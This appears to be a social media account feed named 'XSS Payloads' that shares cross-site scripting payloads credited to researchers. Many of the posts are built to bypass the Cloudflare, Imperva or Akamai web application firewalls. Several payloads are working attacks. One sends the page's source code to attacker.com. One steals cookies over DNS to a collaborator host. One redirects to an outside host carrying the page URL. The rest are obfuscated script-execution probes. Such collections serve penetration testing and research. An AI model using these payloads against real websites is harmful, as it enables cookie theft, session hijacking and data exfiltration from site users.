user avatar
XSS Payloads
@XssPayloads
xss-payloads.paracyberbellum.io
Joined November 2014
0
Following
54.9K
Followers
  • Pinned
    user avatar
    XSS Payloads
    @XssPayloads
    Oct 13, 2025
    Get your XSS Payloads stuff from our online store ! xss-payloads.myspreadshop.net
    10K
  • user avatar
    XSS Payloads
    @XssPayloads
    May 20, 2020
    Hieroglyph-based payload by @aemkei ! 𓅂='',𓂀=!𓅂+𓅂,𓁄=!𓂀+𓅂,𓊎=𓅂+{},𓆣=𓂀 [𓅂++],𓊝=𓂀[𓇎=𓅂],𓏢=++𓇎+𓅂,𓆗=𓊎[𓇎+𓏢 ],𓂀[𓆗+=𓊎[𓅂]+(𓂀.𓁄+𓊎)[𓅂]+𓁄[𓏢]+𓆣+ 𓊝+𓂀[𓇎]+𓆗+𓆣+𓊎[𓅂]+𓊝][𓆗](𓁄[𓅂]+𓁄[ 𓇎]+𓂀[𓏢]+𓊝+𓆣+'`𓅂 𓏢 𓂀 𓁄 𓆣 𓊝 𓇎`')``
  • user avatar
    XSS Payloads
    @XssPayloads
    Nov 29, 2021
    A payload that bypasses Cloudflare WAF, by @ex_mi <img/src=x onError="`${x}`;alert(`Ex.Mi`);">
  • user avatar
    XSS Payloads
    @XssPayloads
    Apr 20, 2022
    WAF bypass payload and detailed explanation by @s0md3v <sVg/onfake="x=y"oNload=;1^(co\u006efirm)``^1//
  • user avatar
    XSS Payloads
    @XssPayloads
    Aug 24, 2020
    alert() with no parenthesis, back ticks, brackets, quotes, braces, etc. by @stealthybugs a=8,b=confirm,c=window,c.onerror=b;throw-a
  • user avatar
    XSS Payloads
    @XssPayloads
    Jan 25, 2018
    A list of 500 XSS vectors. Good reference...
    Top 500 Most Important XSS Script Cheat Sheet for Web Application Penetration Testing
    From gbhackers.com
  • user avatar
    XSS Payloads
    @XssPayloads
    Sep 30, 2022
    Escalating SSTI to reflected XSS using curly braces {}, a good artcile by @Sagar__Sajeev
    Escalating SSTI to Reflected XSS using curly braces { }
    From sagarsajeev.medium.com
  • user avatar
    XSS Payloads
    @XssPayloads
    Jun 2, 2025
    Full-Width Symbols, a useful cheatsheet to bypass WAF by @therceman
    28K
  • user avatar
    XSS Payloads
    @XssPayloads
    Oct 11, 2019
    A payload that steals source code of the current webpage without triggering browser restrictions, by @s0md3v <svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">
  • user avatar
    XSS Payloads
    @XssPayloads
    May 22, 2023
    2 payloads to bypass CloudFlare WAF by @RAWEZH__1 "%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F "><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
    31K
  • user avatar
    XSS Payloads
    @XssPayloads
    Mar 1, 2021
    Imperva WAF bypass payload by @0xInfection <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
  • user avatar
    XSS Payloads
    @XssPayloads
    May 16, 2022
    A variant most likely to bypass WAF by @lp1eu <img/src/onerror=arguments[0].path.pop().['al'+'ert'](1)>
  • user avatar
    XSS Payloads
    @XssPayloads
    Sep 28, 2021
    A payload to bypass Akamai WAF, by @stealthybugs "><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click
  • user avatar
    XSS Payloads
    @XssPayloads
    Dec 27, 2019
    Cookie theft over DNS while XSS, payload by @chaignc <script> document.location = "//" + btoa(document.cookie).replace(/[A-Z]/g, '$&.').replace(/=/g, 'X') + "I." + "YourBurpCollaborator"; </script> Decode: atob("Your_Receveived_DNS".replace(/(.)./g, (_,x)=>x.toUpperCase()))